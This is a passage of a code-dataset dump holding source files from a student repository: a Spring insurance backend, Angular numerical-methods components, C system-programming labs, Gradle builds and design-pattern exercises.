away\");\n }\n}\n\npublic class Application {\n public static void main(String... args) {\n CoffeMachine coffeMachine = new CoffeMachine();\n for (int i = 0; i < 7; i++) {\n coffeMachine.makeCoffe();\n System.out.println();\n }\n }\n}\n" }, { "alpha_fraction": 0.7544195055961609, "alphanum_fraction": 0.7544195055961609, "avg_line_length": 37.05454635620117, "blob_id": "b337749d3dba160dfe08fff11bece50d299a0a2f", "content_id": "a5494b6af4dd92626b2d70d502f4821e7994c6b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2093, "license_type": "no_license", "max_line_length": 123, "num_lines": 55, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/security/impl/UserServiceImpl.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.security.impl;\n\nimport io.github.k_gregory.insurance.entity.Role;\nimport io.github.k_gregory.insurance.entity.User;\nimport io.github.k_gregory.insurance.exception.UserExistsException;\nimport io.github.k_gregory.insurance.service.security.UserService;\nimport io.github.k_gregory.insurance.service.repository.RoleRepository;\nimport io.github.k_gregory.insurance.service.repository.UserRepository;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.security.crypto.password.PasswordEncoder;\nimport org.springframework.stereotype.Service;\nimport org.springframework.transaction.annotation.Isolation;\nimport org.springframework.transaction.annotation.Transactional;\n\nimport java.util.Collection;\nimport java.util.HashSet;\nimport java.util.List;\n\n\n@Service\npublic class UserServiceImpl implements UserService {\n private final UserRepository userRepository;\n private final RoleRepository roleRepository;\n private final PasswordEncoder passwordEncoder;\n\n @Autowired\n public UserServiceImpl(UserRepository userRepository, RoleRepository roleRepository, PasswordEncoder passwordEncoder) {\n this.userRepository = userRepository;\n this.roleRepository = roleRepository;\n this.passwordEncoder = passwordEncoder;\n }\n\n @Override\n @Transactional(\n isolation = Isolation.SERIALIZABLE\n )\n public User register(String login, String password, Collection<String> roleNames) {\n User existentUser = userRepository.findOne(login);\n if (existentUser != null) {\n throw new UserExistsException(login);\n }\n\n User user = new User();\n String passwordHash = passwordEncoder.encode(password);\n List<Role> roles = roleRepository.findAll(roleNames);\n if (roles.size() != roleNames.size())\n throw new IllegalArgumentException(\"roleNames\");\n\n user.setLogin(login);\n user.setPasswordHash(passwordHash);\n user.setRoles(new HashSet<>(roles));\n\n return userRepository.save(user);\n }\n}\n" }, { "alpha_fraction": 0.6807772517204285, "alphanum_fraction": 0.6828591227531433, "avg_line_length": 26.711538314819336, "blob_id": "0bbf8f1a89c1f5f2338a0610552dca57b55db5a2", "content_id": "2f98adcd4d069030844fc8a4a66e7fd7fecb22de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1469, "license_type": "no_license", "max_line_length": 98, "num_lines": 52, "path": "/numerical-methods/src/app/app.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {ChangeDetectorRef, Component, OnDestroy, OnInit} from '@angular/core';\nimport {MediaMatcher} from \"@angular/cdk/layout\";\n\nimport {routes} from \"./routes\";\nimport {ActivatedRoute, Router, RoutesRecognized} from \"@angular/router\";\n\n@Component({\n selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent implements OnDestroy, OnInit {\n private currentMethodName? : string;\n opened = true;\n routes : {name: string, path: string}[];\n\n mobileQuery: MediaQueryList;\n\n private _mobileQueryListener: () => void;\n\n constructor(changeDetectorRef: ChangeDetectorRef, media: MediaMatcher, private router: Router) {\n this.mobileQuery = media.matchMedia('(max-width: 600px)');\n this._mobileQueryListener = () => changeDetectorRef.detectChanges();\n this.mobileQuery.addListener(this._mobileQueryListener);\n\n\n this.routes = routes.map(r=>({\n name: <string>r.data.name,\n path: r.path\n }))\n }\n\n ngOnDestroy(): void {\n this.mobileQuery.removeListener(this._mobileQueryListener);\n }\n\n get title(): string {\n if(this.currentMethodName){\n return \"Чисельні методи: \" + this.currentMethodName;\n } else {\n return \"Чисельні методи\";\n }\n }\n\n ngOnInit(): void {\n this.router.events.subscribe((d)=>{\n if(d instanceof RoutesRecognized){\n this.currentMethodName = d.state.root.firstChild.data.name;\n }\n })\n }\n}\n" }, { "alpha_fraction": 0.6546071171760559, "alphanum_fraction": 0.6890898942947388, "avg_line_length": 36.63829803466797, "blob_id": "0ba071a6c87eafae92288250269841d29d4edbcd", "content_id": "139c9fb26278de1c9ed21208a02ce22a0500a150", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1769, "license_type": "no_license", "max_line_length": 110, "num_lines": 47, "path": "/insurance/backend/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'io.github.k-gregory'\nversion '1.0-SNAPSHOT'\n\nbuildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n classpath 'com.github.ben-manes:gradle-versions-plugin:0.15.0'\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:1.5.2.RELEASE\")\n }\n}\n\nrepositories {\n mavenCentral()\n}\n\napply plugin: 'java'\napply plugin: 'org.springframework.boot'\napply plugin: 'com.github.ben-manes.versions'\n\n\nsourceCompatibility = 1.8\n\n\ndependencies {\n compile group: 'org.springframework.boot', name: 'spring-boot-devtools', version: '1.5.4.RELEASE'\n compile group: 'org.springframework.boot', name: 'spring-boot-starter-thymeleaf', version: '1.5.4.RELEASE'\n compile group: 'org.springframework', name: 'spring-websocket', version: '4.3.9.RELEASE'\n compile group: 'org.springframework.security', name: 'spring-security-config', version: '4.2.3.RELEASE'\n compile group: 'org.springframework.security', name: 'spring-security-web', version: '4.2.3.RELEASE'\n\n compile group: 'org.springframework.data', name: 'spring-data-jpa', version: '1.11.4.RELEASE'\n compile group: 'org.springframework', name: 'spring-orm', version: '4.3.9.RELEASE'\n compile group: 'com.zaxxer', name: 'HikariCP', version: '2.6.2'\n compile group: 'org.hibernate', name: 'hibernate-core', version: '5.2.10.Final'\n compile group: 'org.postgresql', name: 'postgresql', version: '42.1.1'\n compile \"org.flywaydb:flyway-core:4.2.0\"\n\n compile group: 'org.aspectj', name: 'aspectjweaver', version: '1.8.10'\n\n compile group: 'com.google.guava', name: 'guava', version: '22.0'\n compile group: 'com.fasterxml.jackson.core', name: 'jackson-databind', version: '2.8.8.1'\n\n testCompile group: 'junit', name: 'junit', version: '4.12'\n}\n" }, { "alpha_fraction": 0.7360405921936035, "alphanum_fraction": 0.7563451528549194, "avg_line_length": 15.416666984558105, "blob_id": "583cd4bb010fc704e504bdb14cbe13d1580f0626", "content_id": "fe279fa4607ee0a7fa6240741ce4fdc4b2114089", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 197, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/graphics/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "apply plugin: 'java'\napply plugin: 'application'\n\nmainClassName=\"io.github.k_gregory.graphics.lab1.Application\"\n\nrepositories{\n mavenCentral()\n}\n\ndependencies {\n compile \"org.ejml:ejml-all:0.34\"\n}\n" }, { "alpha_fraction": 0.7540279030799866, "alphanum_fraction": 0.7540279030799866, "avg_line_length": 21.987653732299805, "blob_id": "64db335307bd38a64e7b2eb0c15d186225c9edba", "content_id": "b3a312c57f843b605987899aa3e3abce0667018e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 3724, "license_type": "no_license", "max_line_length": 69, "num_lines": 162, "path": "/insurance/frontend/src/consultation/ConsultationMessage.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export interface WsNotificationVisitor{\n visitNewQuestionNotification(c: NewQuestionNotification);\n visitNewClientNotification(c: NewClientNotification);\n visitNewAnswerNotification(c: NewAnswerNotification);\n visitClientDisconnectNotification(c: ClientDisconnectNotification);\n visitFreeClientListNotification(c: FreeClientListNotification);\n visitClientAssignedNotification(c: ClientAssignedNotification);\n visitMessageListNotification(c: MessageListNotification);\n}\n\nexport interface WsNotification{\n accept(visitor: WsNotificationVisitor)\n}\n\nexport class SupportMessage{\n text: string;\n fromSupport: boolean;\n\n constructor(text: string, fromSupport: boolean) {\n this.text = text;\n this.fromSupport = fromSupport;\n }\n}\n\nexport class NewQuestionNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitNewQuestionNotification(this)\n }\n\n message: SupportMessage;\n clientId: string;\n\n constructor(message: SupportMessage, clientId: string) {\n this.message = message;\n this.clientId = clientId;\n }\n}\n\nexport class NewClientNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitNewClientNotification(this)\n }\n clientId: string;\n\n constructor(clientId: string) {\n this.clientId = clientId;\n }\n}\n\nexport class NewAnswerNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitNewAnswerNotification(this)\n }\n\n message: SupportMessage;\n\n constructor(message: SupportMessage) {\n this.message = message;\n }\n}\n\nexport class ClientDisconnectNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitClientDisconnectNotification(this)\n }\n\n clientId: string;\n\n constructor(clientId: string) {\n this.clientId = clientId;\n }\n}\n\nexport class FreeClientListNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitFreeClientListNotification(this)\n }\n\n clients: string[];\n\n constructor(clients: string[]) {\n this.clients = clients;\n }\n}\n\nexport class ClientAssignedNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitClientAssignedNotification(this)\n }\n\n clientId: string;\n toRecv: boolean;\n\n constructor(clientId: string, toRecv:boolean) {\n this.clientId = clientId;\n this.toRecv = toRecv;\n }\n}\n\nexport class MessageListNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitMessageListNotification(this);\n }\n\n clientId: string;\n messages: SupportMessage[];\n\n constructor(clientId: string, messages: SupportMessage[]) {\n this.clientId = clientId;\n this.messages = messages;\n }\n}\n\nexport class WsRequest{\n tag: String;\n\n constructor(tag: String) {\n this.tag = tag;\n }\n}\n\nexport class FreeClientListRequest extends WsRequest{\n constructor(){\n super('do-list-free');\n }\n}\n\nexport class AssignClientRequest extends WsRequest{\n constructor(clientId: string) {\n super('do-assign-client');\n this.clientId = clientId;\n }\n clientId: string;\n}\n\nexport class AnswerClientRequest extends WsRequest{\n clientId: string;\n message: string;\n\n constructor(clientId: string, message: string) {\n super('do-answer');\n this.clientId = clientId;\n this.message = message;\n }\n}\n\nexport class ListClientMessagesRequest extends WsRequest{\n clientId: string;\n\n constructor(clientId: string) {\n super('do-list-client-messages');\n this.clientId = clientId;\n }\n}\n\nexport class UnassignClientRequest extends WsRequest{\n clientId: string;\n constructor(cliendId: string){\n super(\"do-unassign-client\");\n this.clientId = cliendId;\n }\n}\n" }, { "alpha_fraction": 0.7054263353347778, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 42, "blob_id": "c95b74b65298d833229b27bf6797306575607cd9", "content_id": "6b87bd38902b08cc6f5302c30a91273ceb86cc6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "no_license", "max_line_length": 69, "num_lines": 3, "path": "/system_programming/lab1/task1/run.sh", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "rm build/main;\ncc -std=c99 -Wall -Wextra -Wpedantic \"main.c\" -g -ggdb -o build/main;\n./build/main build/sample build/output_file\n" }, { "alpha_fraction": 0.7654462456703186, "alphanum_fraction": 0.7654462456703186, "avg_line_length": 38.727272033691406, "blob_id": "df9b9c588f7b1387f658b27894fb32dbd3a06116", "content_id": "eee3cfd10ecacd765ae5afd55116aff8d1cf13c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 874, "license_type": "no_license", "max_line_length": 103, "num_lines": 22, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/websocket/PingFilterWebSocketDecorator.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.websocket;\n\nimport org.springframework.web.socket.TextMessage;\nimport org.springframework.web.socket.WebSocketHandler;\nimport org.springframework.web.socket.WebSocketMessage;\nimport org.springframework.web.socket.WebSocketSession;\nimport org.springframework.web.socket.handler.WebSocketHandlerDecorator;\n\npublic class PingFilterWebSocketDecorator extends WebSocketHandlerDecorator {\n @Override\n public void handleMessage(WebSocketSession session, WebSocketMessage<?> message) throws Exception {\n if(message instanceof TextMessage){\n TextMessage msg = (TextMessage) message;\n if(msg.getPayload().equals(\"ping\")) return;\n }\n getDelegate().handleMessage(session, message);\n }\n\n public PingFilterWebSocketDecorator(WebSocketHandler delegate) {\n super(delegate);\n }\n}\n" }, { "alpha_fraction": 0.8319672346115112, "alphanum_fraction": 0.8319672346115112, "avg_line_length": 33.85714340209961, "blob_id": "f6bdc45e2b6c2ae0603cf7507f93be6a0b1bfadb", "content_id": "8808a752fb4a8f056ded6a345291689cca592809", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 244, "license_type": "no_license", "max_line_length": 69, "num_lines": 7, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/repository/UserRepository.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.repository;\n\nimport io.github.k_gregory.insurance.entity.User;\nimport org.springframework.data.jpa.repository.JpaRepository;\n\npublic interface UserRepository extends JpaRepository<User, String> {\n}\n" }, { "alpha_fraction": 0.6413043737411499, "alphanum_fraction": 0.6431159377098083, "avg_line_length": 21.079999923706055, "blob_id": "b40dc8053b153f56dccc60a57ac3cc1e39e98029", "content_id": "db57d7171d86ac6d98f731640cc250123a309441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 552, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/numerical-methods/src/app/file-input/file-input.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Component, EventEmitter, Input, OnInit, Output} from '@angular/core';\n\n@Component({\n selector: 'app-file-input',\n templateUrl: './file-input.component.html',\n styleUrls: ['./file-input.component.css']\n})\nexport class FileInputComponent {\n file: any;\n\n @Input() caption: string;\n @Output() loaded = new EventEmitter<String>();\n\n constructor() { }\n\n fileChanged(ev){\n this.file = ev.target.files[0];\n\n const fr = new FileReader();\n fr.onload = (e)=>{\n this.loaded.emit(fr.result);\n };\n fr.readAsText(this.file);\n }\n}\n" }, { "alpha_fraction": 0.6780303120613098, "alphanum_fraction": 0.683080792427063, "avg_line_length": 17.418603897094727, "blob_id": "9af23e1466f7acfb7db11247536a1beb2d259a72", "content_id": "e272313e5639a1f9ccbf331e01b2a5a6e8bdfa90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 792, "license_type": "no_license", "max_line_length": 61, "num_lines": 43, "path": "/insurance/frontend/src/websocket/ConnectionContext.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export interface SendableState{\n writeMessage(msg:any);\n replace(s: SendableState)\n}\n\nexport class BufferSendableState implements SendableState{\n replace(s: SendableState) {\n this.buffer.forEach(msg=>s.writeMessage(msg))\n }\n\n buffer: any[] = [];\n\n writeMessage(msg: any) {\n this.buffer.push(msg)\n }\n}\n\nexport class WebSocketSendableState implements SendableState{\n replace(s: SendableState) {\n }\n\n constructor(private ws: WebSocket){\n setInterval(()=>ws.send(\"ping\"), 1000)\n }\n\n writeMessage(msg: any) {\n this.ws.send(msg)\n }\n\n}\n\nexport class ConnectionContext{\n state: SendableState;\n\n setState(s: SendableState){\n if(this.state != null) this.state.replace(s);\n this.state = s;\n }\n\n write(msg: any){\n this.state.writeMessage(JSON.stringify(msg));\n }\n}\n" }, { "alpha_fraction": 0.5412458181381226, "alphanum_fraction": 0.560606062412262, "avg_line_length": 17.5625, "blob_id": "b8ac3c658fd60711edeb5a13a9954ae52544bc61", "content_id": "375ded115cb95b8625494ce0e1168675328a279a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 78, "num_lines": 64, "path": "/system_programming/lab1/task2/main.c", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "#include <sys/select.h>\n#include <sys/types.h>\n#include <unistd.h>\n\n#include <stdio.h>\n#include <stdlib.h>\n\n// Max buffer size is 1024 and 1 byte for \\0\nstatic const size_t BUFF_SIZE = 1024 + 1;\n\nint main(int argc, char *argv[]) {\n int exit_code;\n char *buffer;\n fd_set rfds;\n\n exit_code = EXIT_FAILURE;\n\n if (argc != 2) {\n fprintf(stderr, \"Usage: %s ID\\n\", argv[0]);\n goto EXIT;\n }\n\n buffer = malloc(BUFF_SIZE);\n\n while (1) {\n int retval;\n struct timeval tv;\n\n tv.tv_sec = 5;\n tv.tv_usec = 0;\n\n FD_ZERO(&rfds);\n FD_SET(STDIN_FILENO, &rfds);\n\n retval = select(STDIN_FILENO + 1, &rfds, NULL, NULL, &tv);\n\n if (retval < 0) {\n perror(\"select()\");\n goto CLEANUP_BUFFER;\n }\n\n if(retval == 0) {\n printf(\"%s no input for 5 sec\\n\", argv[1]); \n }\n\n if (retval > 0) {\n // STDIN_FILENO is the only descriptor in set, no need to check FD_ISSET\n if (fgets(buffer, BUFF_SIZE, stdin) != NULL) {\n printf(\"%s got: %s\", argv[1], buffer);\n } else { // fgets returns NULL\n\tputs(\"Exiting...\");\n break;\n }\n }\n }\n\n exit_code = EXIT_SUCCESS;\n\nCLEANUP_BUFFER:\n free(buffer);\n\nEXIT:\n exit(exit_code);\n}\n" }, { "alpha_fraction": 0.6243256330490112, "alphanum_fraction": 0.6591466665267944, "avg_line_length": 38.779998779296875, "blob_id": "4747b970d28ba3c1fa8cbf5753073b0a2be1e087", "content_id": "c952d585b384380527ca96a942e90865ddebfc58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 2039, "license_type": "no_license", "max_line_length": 112, "num_lines": 50, "path": "/oldtest/rss-reader/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'io.github.k-gregory.otp'\r\nversion '1.0-SNAPSHOT'\r\n\r\nbuildscript {\r\n repositories {\r\n mavenCentral()\r\n }\r\n dependencies {\r\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:1.5.2.RELEASE\")\r\n }\r\n}\r\n\r\napply plugin: 'java'\r\napply plugin: 'org.springframework.boot'\r\n\r\nsourceCompatibility = 1.8\r\n\r\nrepositories {\r\n mavenCentral()\r\n}\r\n\r\ndependencies {\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-devtools', version: '1.5.3.RELEASE'\r\n\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-data-jpa', version: '1.5.3.RELEASE'\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-web', version: '1.5.3.RELEASE'\r\n compile group: 'org.springframework.boot', name: 'spring-boot-starter-jdbc', version: '1.5.3.RELEASE'\r\n\r\n compile group: 'org.springframework.data', name: 'spring-data-jpa', version: '1.11.3.RELEASE'\r\n compile group: 'org.springframework', name: 'spring-web', version: '4.3.8.RELEASE'\r\n\r\n\r\n compile group: 'com.h2database', name: 'h2', version: '1.4.195'\r\n compile group: 'org.postgresql', name: 'postgresql', version: '42.0.0'\r\n compile group: 'org.hibernate', name: 'hibernate-core', version: '5.2.10.Final'\r\n\r\n compile group: 'com.google.guava', name: 'guava', version: '21.0'\r\n compile group: 'org.jsoup', name: 'jsoup', version: '1.10.2'\r\n compile group: 'org.apache.lucene', name: 'lucene-snowball', version: '3.0.3'\r\n\r\n\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-web', version: '1.5.3.RELEASE'\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-thymeleaf', version: '1.5.3.RELEASE'\r\n /*\r\n compile group: 'org.springframework', name: 'spring-orm', version: '4.3.8.RELEASE'\r\n compile group: 'com.zaxxer', name: 'HikariCP', version: '2.6.1'\r\n compile group: 'org.hibernate', name: 'hibernate-core', version: '5.2.10.Final'\r\n compile group: 'org.postgresql', name: 'postgresql', version: '42.0.0'\r\n */\r\n}\r\n" }, { "alpha_fraction": 0.5813252925872803, "alphanum_fraction": 0.5890227556228638, "avg_line_length": 20.342857360839844, "blob_id": "af60a9dd74a566d186a460bef1d9d7c0fbd05709", "content_id": "0d5dd5f31d0519c79dccee671a878dbfc261ab95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2988, "license_type": "no_license", "max_line_length": 77, "num_lines": 140, "path": "/system_programming/lab1/task1/main.c", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "#include <fcntl.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <unistd.h>\n\n#include <ctype.h>\n#include <errno.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nstatic const size_t BUFF_SIZE = 7;\n\n/*\n * Reads data from src_fd, lowers it and writes to dest_fd\n * Returns count of bytes sent\n * On error, returns -1 and sets errno\n * This function doesn't close the FDs\n */\nssize_t lowering_sendfile(int src_fd, int dest_fd, void *_buffer,\n size_t buffer_size) {\n ssize_t read_bytes;\n size_t bytes_counter;\n char *buffer;\n\n buffer = _buffer;\n bytes_counter = 0;\n\n do {\n ssize_t i;\n char *buffer_pos, *buffer_end;\n\n read_bytes = read(src_fd, buffer, buffer_size);\n\n if (read_bytes < 0) {\n return -1;\n }\n\n buffer_pos = buffer;\n buffer_end = buffer + read_bytes;\n\n for (i = 0; i < read_bytes; i++) {\n /* TODO: Doesn't work with Unicode */\n buffer[i] = tolower(buffer[i]);\n }\n\n while (buffer_pos != buffer_end) {\n ssize_t wrote_bytes;\n\n wrote_bytes = write(dest_fd, buffer_pos, buffer_end - buffer_pos);\n if (wrote_bytes < 0) {\n return -1;\n }\n\n buffer_pos += wrote_bytes;\n }\n\n bytes_counter += read_bytes;\n } while (read_bytes != 0);\n\n return bytes_counter;\n}\n\nint main(int argc, char *argv[]) {\n int exit_code;\n\n int in_fd, out_fd;\n\n ssize_t bytes_written;\n void *buffer;\n\n int stat_code;\n struct stat in_stat_info, out_stat_info;\n\n exit_code = EXIT_FAILURE;\n\n if (argc != 3) {\n fprintf(stderr, \"Usage: %s SRC DEST\\n\", argv[0]);\n goto EXIT;\n }\n\n stat_code = stat(argv[1], &in_stat_info);\n if (stat_code < 0) {\n perror(\"Bad input file\");\n goto EXIT;\n }\n\n stat_code = stat(argv[2], &out_stat_info);\n if (stat_code < 0 && (errno != ENOENT)) {\n perror(\"Bad output file\");\n goto EXIT;\n } else if (stat_code == 0) { /* Check that input file is not output file */\n if (in_stat_info.st_dev == out_stat_info.st_dev &&\n in_stat_info.st_ino == out_stat_info.st_ino) {\n fputs(\"SRC and DEST must be different files\", stderr);\n goto EXIT;\n }\n }\n\n buffer = malloc(BUFF_SIZE);\n\n in_fd = open(argv[1], O_RDONLY);\n if (in_fd < 0) {\n perror(\"Can't open input file\");\n goto CLEANUP_BUFFER;\n }\n\n out_fd = open(argv[2], O_CREAT | O_WRONLY | O_TRUNC,\n S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);\n if (out_fd < 0) {\n perror(\"Can't open output file\");\n goto CLEANUP_IN_FD;\n }\n\n bytes_written = lowering_sendfile(in_fd, out_fd, buffer, BUFF_SIZE);\n if (bytes_written < 0) {\n perror(\"Can't copy file contents\");\n goto CLEANUP_OUT_FD;\n }\n printf(\"Wrote %ld bytes\\n\", bytes_written);\n\n exit_code = EXIT_SUCCESS;\n\nCLEANUP_OUT_FD:\n if (close(out_fd) != 0) {\n perror(\"Can't close output file\");\n exit_code = EXIT_FAILURE;\n }\n\nCLEANUP_IN_FD:\n if (close(in_fd) != 0) {\n perror(\"Can't close input file\");\n exit_code = EXIT_FAILURE;\n }\n\nCLEANUP_BUFFER:\n free(buffer);\n\nEXIT:\n exit(exit_code);\n}\n" }, { "alpha_fraction": 0.6309834718704224, "alphanum_fraction": 0.6335944533348083, "avg_line_length": 22.446807861328125, "blob_id": "2d29f73264a990082a3db9048c019b7149f92ce3", "content_id": "46b9568b9b2fc69c51181bae874eb34dabc55b2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1149, "license_type": "no_license", "max_line_length": 53, "num_lines": 47, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/datatypes/MathVal.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2.datatypes;\r\n\r\nimport io.github.k_gregory.otp.lab2.MathValVisitor;\r\n\r\npublic abstract class MathVal {\r\n public abstract MathVal accept(MathValVisitor v);\r\n\r\n public MathVal mul(MathVal right) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal plus(MathVal right) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal vMul(MathVal right) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal transpose() {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal inverse() {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal absolute() {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal matMul(MathVal other) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal negate() {\r\n return mul(new NumVal(-1.d));\r\n }\r\n\r\n public MathVal div(MathVal right) {\r\n return mul(right.inverse());\r\n }\r\n\r\n public MathVal minus(MathVal right) {\r\n return plus(right.negate());\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7457627058029175, "alphanum_fraction": 0.7457627058029175, "avg_line_length": 28.5, "blob_id": "cf386b4a8087a5bafaf879231c5244947247dc62", "content_id": "5a456cd97724bda0e8693b682e92332968273bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 295, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/data/NewAnswerNotification.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.data;\n\npublic class NewAnswerNotification extends ConsultNotification{\n public final SupportMessage message;\n\n public NewAnswerNotification(SupportMessage message) {\n super(\"new-answer\");\n this.message = message;\n }\n}\n" }, { "alpha_fraction": 0.5731394290924072, "alphanum_fraction": 0.5778443217277527, "avg_line_length": 19.330434799194336, "blob_id": "1365526eccc53f75a8d4c21abc9c036ce4d47a1b", "content_id": "7c1f2373e1ac33025c4bf7dfdd98eab28ca4cc8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2377, "license_type": "no_license", "max_line_length": 53, "num_lines": 115, "path": "/numerical-methods/src/app/newton-first/newton-first.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Component} from '@angular/core';\nimport {decodeCsv, getControls} from '../csv'\nimport {newton_first} from \"../newton\";\nimport {ChartDataSets, ChartOptions} from \"chart.js\";\n\n\n@Component({\n selector: 'app-newton-first',\n templateUrl: './newton-first.component.html',\n styleUrls: ['./newton-first.component.css']\n})\nexport class NewtonFirstComponent {\n error?: string;\n\n inputFunction?: {x: number, y: number}[];\n controlFunction: {x: number, y: number}[];\n\n selectedPoint: {x: number, y: number};\n\n point?: string;\n result?: number;\n\n colors: any;\n chartDss? : ChartDataSets[] = null;\n\n\n constructor() { }\n\n options : ChartOptions = {\n tooltips: {\n enabled: true\n }\n };\n\n updateDss(){\n const base : ChartDataSets = {\n label: 'Вхідна функція',\n data: this.inputFunction,\n showLine: true\n };\n\n const cls = [{\n pointBackgroundColor: 'blue'\n }];\n const res: ChartDataSets[] = [base];\n\n if(this.controlFunction){\n res.push({\n label: 'Контрольні точки',\n data: this.controlFunction,\n });\n cls.push({\n pointBackgroundColor: 'rgba(255, 0, 0)'\n });\n }\n\n if(this.selectedPoint){\n console.log(\"x\");\n res.push({\n label: 'Обрана точка',\n data: [this.selectedPoint]\n });\n cls.push({\n pointBackgroundColor: 'rgba(0, 255, 0)'\n });\n }\n\n\n this.chartDss = null;\n this.colors = null;\n setTimeout(()=>{\n this.chartDss = res;\n this.colors = cls;\n }, 1)\n }\n\n\n inputSelected(csv: string){\n this.result = null;\n this.error = null;\n this.inputFunction = null;\n\n try{\n this.inputFunction = decodeCsv(csv);\n this.updateDss();\n } catch (e) {\n this.error = e.toString();\n }\n }\n\n controlSelected(csv: string){\n this.controlFunction = getControls(csv).map(x=>({\n x, y: newton_first(this.inputFunction, x)\n }));\n console.log(this.controlFunction);\n this.updateDss();\n }\n\n calc(){\n const x = parseFloat(this.point);\n if(isNaN(x)){\n this.error=\"Can't parse input point\";\n this.selectedPoint = null;\n } else {\n this.error = null;\n this.selectedPoint = {\n x,\n y:newton_first(this.inputFunction, x),\n };\n this.result = this.selectedPoint.y;\n this.updateDss();\n }\n }\n\n}\n" }, { "alpha_fraction": 0.5537790656089783, "alphanum_fraction": 0.5595930218696594, "avg_line_length": 22.571428298950195, "blob_id": "05da3e186a148a885c285df9f05e960f7d05aec9", "content_id": "b4f3be30856561fa22d2892c2dcec888e7d169ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 688, "license_type": "no_license", "max_line_length": 59, "num_lines": 28, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/GiftPack.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\npublic class GiftPack implements Gift {\r\n private Gift[] 